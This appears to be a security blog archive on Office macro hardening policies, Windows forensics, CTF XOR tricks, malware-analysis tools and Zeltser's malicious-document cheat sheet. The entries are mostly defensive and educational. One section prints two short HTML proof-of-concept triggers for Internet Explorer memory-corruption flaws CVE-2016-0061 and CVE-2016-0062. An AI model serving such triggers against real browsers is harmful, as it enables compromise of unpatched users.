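        [pscustomobject]@{ Setting = "$app - Allow Trusted Locations on the network"; Key = "$sec\Trusted Locations"; Name = 'AllowNetworkLocations'; Expected = 0 }
    }
    # Outlook: Level 4 = "Never warn, disable all"
    [pscustomobject]@{ Setting = 'Outlook - Security setting for macros'; Key = "$office\Outlook\Security"; Name = 'Level'; Expected = 4 }
)

function Test-OfficeMacroPolicy {
    param([object[]]$Checks)
    foreach ($c in $Checks) {
        $item   = Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction SilentlyContinue
        $actual = if ($item) { $item.($c.Name) } else { $null }
        [pscustomobject]@{
            Setting  = $c.Setting
            Expected = $c.Expected
            Actual   = if ($null -eq $actual) { 'not set' } else { $actual }
            # "not set" means the policy never reached this user: their own Trust Center choice wins.
            Status   = if ($actual -eq $c.Expected) { 'OK' } else { 'NOT ENFORCED' }
        }
    }
}

Test-OfficeMacroPolicy -Checks $checks | Format-Table -AutoSize -Wrap
```

Run it as the user whose policy you want to check, after gpupdate, since these are User Configuration settings under HKCU.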

 

Medium importance settings

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
  • Turn off trusted documents: Enabled
  • Turn off Trusted Documents on the network: Enabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
  • Turn off trusted documents: Enabled
  • Turn off Trusted Documents on the network: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
  • Turn off trusted documents: Enabled
  • Turn off Trusted Documents on the network: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
  • Disable all application add-ins: Enabled
  • Disable Trust Bar Notification for unsigned application add-ins and block them: Not configured
  • Require that application add-ins are signed by Trusted Publisher: Not configured

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
  • Allow mix of policy and user locations: Disabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
  • Disable all application add-ins: Enabled
  • Disable Trust Bar Notification for unsigned application add-ins and block them: Not configured
  • Require that application add-ins are signed by Trusted Publisher: Not configured

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
  • Disable all application add-ins: Enabled
  • Disable Trust Bar Notification for unsigned application add-ins and block them: Not configured
  • Require that application add-ins are signed by Trusted Publisher: Not configured

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
  • Disable All ActiveX: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
  • Turn off file validation: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
  • Turn off error reporting for files that fail file validation: Enabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
  • Turn off file validation: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
  • Turn off file validation: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Protected View
  • Do not open files from the Internet Zone in Protected View: Disabled
  • Do not open files in unsafe locations in Protected View: Disabled
  • Set document behaviour if file validation fails: Enabled (Block files completely)
  • Turn off Protected View for attachments opened from Outlook: Disabled

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Protected View
  • Do not open files from the Internet Zone in Protected View: Disabled
  • Do not open files in unsafe locations in Protected View: Disabled
  • Set document behaviour if file validation fails: Enabled (Block files completely)
  • Turn off Protected View for attachments opened from Outlook: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Protected View
  • Do not open files from the Internet Zone in Protected View: Disabled
  • Do not open files in unsafe locations in Protected View: Disabled
  • Set document behaviour if file validation fails: Enabled (Block files completely)
  • Turn off Protected View for attachments opened from Outlook: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
  • Force file extension to match file type: Enabled (Always match file type)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
  • Force file extension to match file type: Enabled (Always match file type)

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
  • Force file extension to match file type: Enabled (Always match file type)

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\File Block Settings
  • dBase III / IV files: Enabled (File block setting: Block)
  • Dif and Sylk files: Enabled (File block setting: Block)
  • Excel 2 macrosheets and add-in files: Enabled (File block setting: Block)
  • Excel 2 worksheets: Enabled (File block setting: Block)
  • Excel 2007 and later add-in files: Enabled (File block setting: Block)
  • Excel 2007 and later binary workbooks: Enabled (File block setting: Block)
  • Excel 2007 and later macro-enabled workbooks and templates: Enabled (File block setting: Block)
  • Excel 3 macrosheets and add-in files: Enabled (File block setting: Block)
  • Excel 3 worksheets: Enabled (File block setting: Block)
  • Excel 4 macrosheets and add-in files: Enabled (File block setting: Block)
  • Excel 4 workbooks: Enabled (File block setting: Block)
  • Excel 4 worksheets: Enabled (File block setting: Block)
  • Excel 95 workbooks: Enabled (File block setting: Block)
  • Excel 95-97 workbooks and templates: Enabled (File block setting: Block)
  • Excel 97-2003 add-in files: Enabled (File block setting: Block)
  • Excel 97-2003 workbooks and templates: Enabled (File block setting: Block)
  • Set default file block behavior: Enabled (Blocked files are not opened)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\File Block Settings
  • PowerPoint 97-2003 presentations, shows, templates and add-in files: Enabled (File block setting: Block)
  • PowerPoint beta files: Enabled (File block setting: Block)
  • Set default file block behavior: Enabled (Blocked files are not opened)

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\File Block Settings
  • Set default file block behavior: Enabled (Blocked files are not opened)
  • Word 2 and earlier binary documents and templates: Enabled (File block setting: Block)
  • Word 2000 binary documents and templates: Enabled (File block setting: Block)
  • Word 2003 binary documents and templates: Enabled (File block setting: Block)
  • Word 2007 binary and later binary documents and templates: Enabled (File block setting: Block)
  • Word 6.0 binary documents and templates: Enabled (File block setting: Block)
  • Word 95 binary documents and templates: Enabled (File block setting: Block)
  • Word 97 binary documents and templates: Enabled (File block setting: Block)
  • Word XP binary documents and templates: Enabled (File block setting: Block)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
  • Make hidden markup visible: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
  • Make hidden markup visible: Enabled

 

LESS important setting

 

GPO setting: value
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Privacy\Trust Center
Allow including screenshot with Office Feedback: Disabled
Automatically receive small updates to improve reliability: Disabled
Disable Opt-in Wizard on first run: Enabled
Enable Customer Experience Improvement Program: Disabled
Send Office Feedback: Disabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center\Trusted Catalogs
Allow Unsecure Apps and Catalogs: Disabled

GIAC - GREM

6 March 2016

Internet Explorer Exploit

12 February 2016

CVE-2016-0061:

 

<meta http-equiv=X-UA-Compatible content=IE=7><form id="&;&;"><body onload=opener?opener["\u4141\u4141"]():open("?")>

Vulnerability Severity Ratings and Impact

CVE-2016-0061 - Microsoft Browser Memory Corruption Vulnerability
  • Internet Explorer 9: Windows Clients Critical / RCE; Windows Servers: Moderate / RCE
  • Internet Explorer 10: Windows Clients Critical / RCE; Windows Servers: Moderate / RCE
  • Internet Explorer 11: Windows Clients Critical / RCE; Windows Servers: Moderate / RCE
  • Internet Explorer 11 on Windows 10: Windows Clients Critical / RCE; Windows Servers: Moderate / RCE

 

CVE-2016-0062

https://technet.microsoft.com/en-us/library/security/ms16-009.aspx

<body onload=open("2.html")>

Vulnerability Severity Ratings and Impact

CVE-2016-0062 - Microsoft Browser Memory Corruption Vulnerability
  • Internet Explorer 9: Not applicable
  • Internet Explorer 10: Not applicable
  • Internet Explorer 11: Windows Clients Critical / RCE; Windows Servers: Moderate / RCE

 

CTF writeups from P4 Team

19 October 2015

https://github.com/p4-team/ctf/blob/master/2015-10-18-hitcon/

https://github.com/p4-team/ctf

 

mandiant free forensic tools

24 June 2015
Source: https://www.mandiant.com/resources/downloads
  • Redline®

    Redline® is a free utility that accelerates the process of triaging hosts suspected of being compromised or infected while supporting in-depth live memory analysis.

  • IOC Editor

    Mandiant's IOC Editor is a free editor for Indicators of Compromise (IOCs).

  • IOC Finder

    Mandiant's IOC Finder is a free tool for collecting host system data and reporting the presence of Indicators of Compromise (IOCs).

  • Memoryze™

    Free memory forensics software designed to help incident responders find evil within live memory.

  • Memoryze™ for the Mac

    Free memory forensics software designed to help incident responders find evil within live memory.

  • Highlighter™

    Highlighter is designed to help security analysts and system administrators rapidly review log and other structured text files.

  • Web Historian™

    Web Historian's capabilities have been consolidated into Mandiant Redline.

  • Research: PdbXtract™

    PdbXtract is a tool to help you explore symbolic type information as extracted from Microsoft programming database files.

  • Research: Mandiant ApateDNS™

    Mandiant ApateDNS is a tool for controlling DNS responses through an easy-to-use graphical user interface (GUI).

  • Research: Mandiant Heap Inspector™

    Mandiant Heap Inspector is a heap visualization and analysis tool. It has the ability to collect a process' heaps using both API and raw methods.

ENISA = published training courses

21 June 2015

mapping of standards for incident response

21 June 2015

 

 

MACCSA - Multinational Alliance for Collaborative Cyber Situational Awareness

 

 

 

Windows forensic - process running

21 June 2015

Investigation options (artifacts that record program execution):

  • Prefetch
  • Shimcache (https://dl.mandiant.com/EE/library/Whitepaper_ShimCacheParser.pdf)
    • projects:
      • python: https://github.com/mandiant/ShimCacheParser
      • C#: https://github.com/woanware/shimcacheparser
  • MUICache
  • UserAssist

 

Interesting presentation: https://digital-forensics.sans.org/summit-archives/DFIR_Summit/Johnny-AppCompatCache-the-Ring-of-Malware-Brice-Daniels-and-Mary-Singh.pdf
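Added example (not from the page or the linked ShimCache parsers) for the UserAssist artifact in the list above: value names are ROT13-encoded program paths and the binary data carries the run count and the last-run FILETIME. The field offsets are the commonly documented Windows 7 and later layout (an assumption to verify against your own systems) and the sample record is constructed.

```python
import codecs
import struct
from datetime import datetime, timedelta, timezone

# Layout of a Windows 7+ UserAssist data value (72 bytes, little-endian), using
# the offsets commonly documented for this artifact (assumed here): run count
# at 4, focus count at 8, focus time in ms at 12, last-execution FILETIME at 60.
RECORD_LEN = 72
RUN_COUNT_OFF = 4
LAST_RUN_OFF = 60
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC; 0 means 'never run'."""
    return None if ft == 0 else EPOCH_1601 + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of filetime_to_datetime, with integer math to avoid float drift."""
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def decode_userassist(value_name, data):
    """Turn one UserAssist value (ROT13 name + binary record) into readable fields."""
    if len(data) < RECORD_LEN:
        raise ValueError("UserAssist record too short: %d bytes" % len(data))
    run_count, focus_count, focus_ms = struct.unpack_from("<III", data, RUN_COUNT_OFF)
    (last_run_ft,) = struct.unpack_from("<Q", data, LAST_RUN_OFF)
    return {
        "path": codecs.decode(value_name, "rot13"),  # value names are ROT13-encoded
        "run_count": run_count,
        "focus_count": focus_count,
        "focus_time_ms": focus_ms,
        "last_run": filetime_to_datetime(last_run_ft),
    }


def make_record(run_count, focus_count, focus_ms, last_run):
    """Build a 72-byte record (used here only to construct sample data)."""
    rec = bytearray(RECORD_LEN)
    struct.pack_into("<III", rec, RUN_COUNT_OFF, run_count, focus_count, focus_ms)
    struct.pack_into("<Q", rec, LAST_RUN_OFF, datetime_to_filetime(last_run))
    return bytes(rec)


# Constructed sample: what a value under ...\UserAssist\{GUID}\Count can look like
SAMPLE_NAME = r"{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr"
SAMPLE_LAST_RUN = datetime(2015, 6, 21, 9, 30, 0, tzinfo=timezone.utc)
SAMPLE_DATA = make_record(3, 2, 45000, SAMPLE_LAST_RUN)


def decode_sample():
    return decode_userassist(SAMPLE_NAME, SAMPLE_DATA)


if __name__ == "__main__":
    for field, value in decode_sample().items():
        print("%-14s %s" % (field, value))
```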

Redirecting tcpdump output from Linux to Windows

8 June 2015

Linux

ssh xdalny-linux "tcpdump -s0 -w - 'port 8080'" | wireshark -k -i -

 

Windows

 

plink -ssh username@remote-host "tcpdump -s 0 -w - 'port 8080'" | wireshark -i -

 

source: https://kaischroed.wordpress.com/2013/01/28/howto-use-wireshark-over-ssh/

Mini malware analyzer

8 June 2015
# isolated lab network: no physical NIC is added to the bridge, so the VMs only see each other and the host
sudo brctl addbr bridge0
sudo tunctl -t tap0
sudo tunctl -t tap1
sudo tunctl -t tap2
sudo tunctl -t tap3
sudo brctl addif bridge0 tap0
sudo brctl addif bridge0 tap1
sudo brctl addif bridge0 tap2
sudo brctl addif bridge0 tap3
sudo ip l set dev tap0 up
sudo ip l set dev tap1 up
sudo ip l set dev tap2 up
sudo ip l set dev tap3 up
# the bridge was created as bridge0 above, so bridge0 (not br0) is the device to bring up
sudo ip l set dev bridge0 up
sudo ip addr add 192.168.168.50/24 dev bridge0

 

XOR in CTFs and a PHP sandbox

4 May 2015

A function that helps find the XOR key

And an online PHP sandbox: http://sandbox.onlinephpfunctions.com/


<?php
function xor_this($string, $int) {

    // Single-byte key; a multi-byte key string works the same way
    $key = chr($int);

    // Our plaintext/ciphertext
    $text = $string;

    // Our output text
    $outText = '';

    // Iterate through each character, cycling through the key bytes
    for ($i = 0; $i < strlen($text);) {
        for ($j = 0; $j < strlen($key) && $i < strlen($text); $j++, $i++) {
            // curly-brace string offsets were removed in PHP 8; use [] instead
            $outText .= $text[$i] ^ $key[$j];
            //echo 'i='.$i.', '.'j='.$j.', '.$outText[$i].'<br />'; //for debugging
        }
    }
    return $outText;
}

$base64 = "";
$encoded = base64_decode($base64);

// Try every single-byte key and print each candidate plaintext
for ($x = 1; $x < 256; $x++) {
    $phase = xor_this($encoded, $x);
    echo "key = " . $x . " : " . $phase . "\r\n";
    echo "----------------------------------------------------------------\r\n";
}
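An added Python counterpart to the PHP snippet above (not code from the page): instead of printing all 255 candidates to read by eye, it ranks single-byte keys with a simple printable/English heuristic and shows the known-plaintext shortcut. The sample ciphertext and the scoring weights are constructed for this example.

```python
import base64
import string

# Heuristic weights for ranking candidate plaintexts (constructed for this example):
# common English letters and space score highest, other lowercase next, any other
# printable byte lowest, and control bytes (other than \t \n \r) are penalised hard.
_COMMON = set(b"etaoinshr ")
_OTHER_LOWER = set(string.ascii_lowercase.encode()) - _COMMON
_PRINTABLE = set(string.printable.encode())


def xor_repeating(data, key):
    """Repeating-key XOR; with a one-byte key this is what xor_this() above does."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def score_plaintext(candidate):
    score = 0
    for b in candidate:
        if b in _COMMON:
            score += 3
        elif b in _OTHER_LOWER:
            score += 2
        elif b in _PRINTABLE:
            score += 1
        else:
            score -= 10
    return score


def brute_force_single_byte(data, top=5):
    """Try all 256 one-byte keys and return the best (score, key, plaintext) tuples."""
    ranked = []
    for k in range(256):
        plain = xor_repeating(data, bytes([k]))
        ranked.append((score_plaintext(plain), k, plain))
    ranked.sort(key=lambda t: t[0], reverse=True)
    return ranked[:top]


def key_from_crib(ciphertext, crib):
    """Known-plaintext shortcut: if the first plaintext bytes are known (a file
    magic, 'flag{'), ciphertext XOR crib yields the key stream directly."""
    return xor_repeating(ciphertext[:len(crib)], crib)


# Constructed sample: a known plaintext XORed with key 0x5A, base64-encoded the
# way the $base64 blob in the PHP snippet would be.
SAMPLE_PLAIN = b"xor is not encryption: flag{single_byte_key}"
SAMPLE_CIPHER = xor_repeating(SAMPLE_PLAIN, b"\x5a")
SAMPLE_B64 = base64.b64encode(SAMPLE_CIPHER).decode()


def recover_sample():
    return brute_force_single_byte(base64.b64decode(SAMPLE_B64), top=1)[0]


if __name__ == "__main__":
    for score, k, plain in brute_force_single_byte(base64.b64decode(SAMPLE_B64), top=3):
        print("score=%4d key=0x%02x %r" % (score, k, plain))
```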

 

UNITE and the malware community

Unified Network of Instructors and Trusted Eliminators | 27 April 2015

Searching for Malware

27 April 2015

Document Analysis

6 April 2015

source: http://zeltser.com/reverse-malware/analyzing-malicious-documents.html

This cheat sheet outlines tips and tools for reverse-engineering malicious documents, such as Microsoft Office (DOC, XLS, PPT) and Adobe Acrobat (PDF) files.

General Approach

  1. Locate potentially malicious embedded code, such as shellcode, VBA macros, or JavaScript.
  2. Extract suspicious code segments from the file.
  3. If relevant, disassemble and/or debug shellcode.
  4. If relevant, deobfuscate and examine JavaScript, ActionScript, or VB macro code.
  5. Understand next steps in the infection chain.

Microsoft Office Binary File Format Notes

Structured Storage (OLE SS) defines a file system inside the binary Microsoft Office file.

Data can be “storage” (folder) and “stream” (file).

Excel stores data inside the “workbook” stream.

PowerPoint stores data inside the “PowerPoint Document” stream.

Word stores data inside various streams.

Tools for Analyzing Microsoft Office Files

OfficeMalScanner locates shellcode and VBA macros from MS Office (DOC, XLS, and PPT) files.

MalHost-Setup extracts shellcode from a given offset in an MS Office file and embeds it in an EXE file for further analysis. (Part of OfficeMalScanner)

Offvis shows raw contents and structure of an MS Office file, and identifies some common exploits.

Hachoir-urwid can navigate through the structure of binary Office files and view stream contents.

Office Binary Translator converts DOC, PPT, and XLS files into Open XML files (includes BiffView tool).

pyOLEScanner.py can examine and decode some aspects of malicious binary Office files.

FileHex (not free) and FileInsight hex editors can parse and edit OLE structures.

Useful MS Office Analysis Commands

OfficeMalScanner file.doc scan brute       Locate shellcode, OLE data, PE files in file.doc
OfficeMalScanner file.doc info             Locate VB macro code in file.doc (no XML files)
OfficeMalScanner file.docx inflate         Decompress file.docx to locate VB code (XML files)
MalHost-Setup file.doc out.exe 0x4500      Extract shellcode from file.doc’s offset 0x4500 and create it as out.exe

Adobe PDF File Format Notes

A PDF file consists of a header, objects, a cross-reference table (to locate objects), and a trailer.

“/OpenAction” and “/AA” (Additional Action) specify the script or action to run automatically.

“/Names”, “/AcroForm”, “/Action” can also specify and launch scripts or actions.

“/JavaScript” specifies JavaScript to run.

“/GoTo*” changes the view to a specified destination within the PDF or in another PDF file.

“/Launch” launches a program or opens a document.

“/URI” accesses a resource by its URL.

“/SubmitForm” and “/GoToR” can send data to a URL.

“/RichMedia” can be used to embed Flash in a PDF.

“/ObjStm” can hide objects inside an Object Stream.

Be mindful of obfuscation with hex codes, such as “/JavaScript” vs. “/J#61vaScript”.
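Added example (not part of Zeltser's cheat sheet): a byte-level scan of a PDF for the names listed above, pdfid-style, that also decodes the #xx obfuscation the last note warns about. The sample PDF is constructed and the name tokenizer is a deliberate simplification of real PDF syntax.

```python
import re
from collections import Counter

# Names from the cheat sheet above; "/GoTo" is matched as a prefix (/GoTo, /GoToR, /GoToE)
SUSPICIOUS = {"/OpenAction", "/AA", "/Names", "/AcroForm", "/JavaScript", "/Launch",
              "/URI", "/SubmitForm", "/RichMedia", "/ObjStm"}
# Simplified PDF name token (assumption: letters, digits and #xx escapes only)
_NAME_RE = re.compile(rb"/([A-Za-z0-9#]+)")
_HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize_name(raw):
    """Decode #xx escapes so that /J#61vaScript is recognised as /JavaScript."""
    return b"/" + _HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def scan_pdf(data):
    """Count suspicious names in a raw PDF and derive a few triage flags from them."""
    counts = Counter()
    obfuscated = 0
    for m in _NAME_RE.finditer(data):
        raw = m.group(1)
        name = normalize_name(raw).decode("latin-1")
        if name in SUSPICIOUS or name.startswith("/GoTo"):
            counts[name] += 1
            if b"#" in raw:  # someone bothered to hide the keyword
                obfuscated += 1
    return {
        "counts": dict(counts),
        "obfuscated_suspicious_names": obfuscated,
        # object streams are normally compressed, so a byte scan can miss names inside them
        "may_hide_objects": counts["/ObjStm"] > 0,
        # script wired to an automatic trigger (document open or page/annotation event)
        "auto_exec_script": counts["/JavaScript"] > 0
        and (counts["/OpenAction"] + counts["/AA"]) > 0,
    }


# Constructed sample (not a real malicious file): the catalog's /OpenAction and a
# page-level /AA both point at an action whose /JavaScript name is hex-obfuscated.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /AA << /O 4 0 R >> >> endobj
4 0 obj << /S /J#61vaScript /JS (app.alert\\(1\\);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for key, value in scan_pdf(SAMPLE_PDF).items():
        print("%-28s %s" % (key, value))
```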

Tools for Analyzing Adobe PDF Files

PDFiD identifies PDFs that contain strings associated with scripts and actions.

PDF-parser and Origami’s pdfwalker examine the structure of PDF files.

Origami’s pdfextract and Jsunpack-n’s pdf.py extract JavaScript from PDF files.

PDF Stream Dumper combines many PDF analysis tools under a single graphical user interface.

Peepdf and Origami’s pdfsh offer an interactive command-line shell for examining PDF files.

PDF X-RAY Lite creates an HTML report containing decoded PDF file structure and contents.

SWF mastah extracts SWF objects from PDF files.

Pyew includes commands for examining and decoding structure and content of PDF files.

Useful PDF Analysis Commands

pdfid.py file.pdf                          Locate script and action-related strings in file.pdf
pdf-parser.py file.pdf                     Show file.pdf’s structure to identify suspect elements
pdf-parser.py --object id file.pdf         Display contents of object id in file.pdf. Add “--filter --raw” to decode the object’s stream.
pdfextract file.pdf                        Extract JavaScript embedded in file.pdf and save it to file.dump.
pdf.py file.pdf                            Extract JavaScript embedded in file.pdf and save it to file.pdf.out.
swf_mastah.py -f file.pdf -o out           Extract PDF objects from file.pdf into the out directory.

Additional PDF Analysis Tools

Malzilla and SpiderMonkey can help deobfuscate JavaScript embedded in malicious PDF files.

Wepawet, Jsunpack, VirusTotal and sandbox tools can analyze some aspects of malicious PDF files.

ExeFilter can filter scripts from Office and PDF files.

References

Adobe Portable Document Format (PDF) Reference

Physical and Logical Structure of PDF Files

Methods for Understanding and Analyzing Targeted Attacks with Office Documents (video)

Analyzing MSOffice Malware with OfficeMalScanner (follow-up presentation)

PDF Security Analysis and Malware Threats

Reverse-Engineering Malware cheat sheet

REMnux Linux distribution for malware analysis.

 

Authored by Lenny Zeltser.

DLL proxy

6 April 2015

A small program that helps build a proxy DLL.

From the DLL's export signature it generates the matching headers and C code.

Written by Yonsm for his own work.

Very helpful for tracing what malware does

when it talks to system libraries.

source: http://www.tinpont.com/software/aheadlib.html

Zeltser - malware

6 April 2015

source: http://zeltser.com/reverse-malware/malware-analysis-webcast.html

http://zeltser.com/presentations/

Reverse-Engineering Malware Course

 

This webcast introduces you to practical approaches of reverse-engineering malicious software on a Windows system. I cover behavioral and code analysis phases, to make this topic accessible even to individuals with a limited exposure to programming concepts. You'll learn the fundamentals and associated tools to get started with malware analysis.

You can view and listen to the recorded version of this webcast at the SANS website. You can also download my slides, complete with full speaker notes. These slides are also useful when you cannot see full details on your screen while watching the webcast.

The presentation walks you through the analysis of a trojan program. If you'd like to experiment with the specimen, you can download the malicious executable here. The password for the archive is the word "infected". Be careful to take the lab isolation precautions I discuss in the presentation!

To learn how to analyze Windows malware on a Linux system, see my companion webcast Malware Analysis Essentials using REMnux.

If you'd like to learn about the full Reverse-Engineering Malware course I teach at SANS Institute, take a look at the REM course page.

My webcast mentioned a local behavior monitoring tool CaptureBAT. This tool is hard to find on the web. You can download a copy here.

 

 

Authored by Lenny Zeltser.

Analysis of suspicious files

6 April 2015

Deobfuscate JavaScript with SpiderMonkey (“js”), “d8”, “rhino-debugger” and Firebug.

Define JavaScript objects using /usr/local/etc/def.js.

You can clean up JavaScript with “js-beautify”.

Control web traffic with “burpsuite” and Tamper Data.

Retrieve websites with “wget” and “curl”.

Hide your origin with “tor start”, “usewithtor”.

Examine malicious Flash files with “swfdump -Ddu”, “flare”, RABCDAsm, and “xxxswf.py”.

Inspect malicious websites and traffic captures with “jsunpackn” after “cd ~remnux/jsunpackn”.

Analysis of suspicious documents

Examine suspicious Microsoft Office documents with “pyOLEScanner.py” and “hachoir-urwid”.

Navigate through PDFs using “pyew”, “peepdf” and “pdfwalker”.

Extract JavaScript or SWFs from PDFs using “pdfextract”, “pdf.py” and “swf_mastah”.

Examine PDFs using “pdfcop”, “pdf-parser”, “pdfid”, “pdfdecompress” and “pdfxray_lite”.

Emulate shellcode execution using “sctest -Svs”.

Analysis of executable programs

Scan the executable for suspicious characteristics and packer signatures using “pescanner”.

Check whether the file might be packed using “densityscout” and “bytehist”.

Explore the executable’s internals using “pyew”.

Identify file type using “trid” and “file”.

Scan files for malware signatures using “clamscan” after refreshing signatures with “sudo freshclam”.

Disassemble code using “radare”, “pyew”, “gdb” and “objdump -Mintel -D”.

Extract metadata using “hachoir-metadata”.

Find and extract subfiles using “hachoir-subfile”.

Compare binary files using “vbindiff”.

Find obfuscated or encrypted data with “xorsearch”, “findaes”, "xortool", “aeskeyfind” and “rsakeyfind”.

Decompile Java class files using “jad” and “jd-gui”.

Analyze memory image files using “volatility”.

VirtualBox server

4 April 2015

Today I called it quits: Windows (as a host) is good for .... !

Windows 7 Enterprise 64-bit "crawls" so badly that starting a VM / several VMs takes a tragically long time...

solution:

Ubuntu + VirtualBox + phpVirtualBox and you get a great VBox server (host):

from page 25 of http://dlc-cdn.sun.com/virtualbox/4.3.26/UserManual.pdf

installation guide: http://www.admin-magazine.com/Articles/Server-Virtualization-with-VirtualBox

despite a fresh install, problems appeared:

1)  * No suitable module for running kernel found

solution: http://askubuntu.com/questions/582109/14-10-virtualbox-no-suitable-module-for-running-kernel-found-cannot-find-ker
+ installing from the Debian package: dpkg -i virtualbox

2) repository keys vs. the security configuration of the internal network

remember the extension pack:

sudo VBoxManage extpack install [path to the pack downloaded from https://www.virtualbox.org/wiki/Downloads]

check:

sudo VBoxManage list extpacks

All that's left is the tedious migration of the images, but that's a piece of cake :)

TAO - The Secret War

from the razorCMS archive | 1 May 2012

source: http://www.wired.com/threatlevel/2013/06/general-keith-alexander-cyberwar/all/

Reading this fragment:

"The NSA was able to extract data about the Iranian networks, listen to and record conversations through computer microphones, even reach into the mobile phones of anyone within Bluetooth range of a compromised machine."

   I wonder whether this is a description lifted from a sci-fi film, but the possibilities of an unconstrained stream of "1"s and "0"s are unbelievable when there is no need to pass through a digital-to-analogue converter :)

Categories: Free Thinking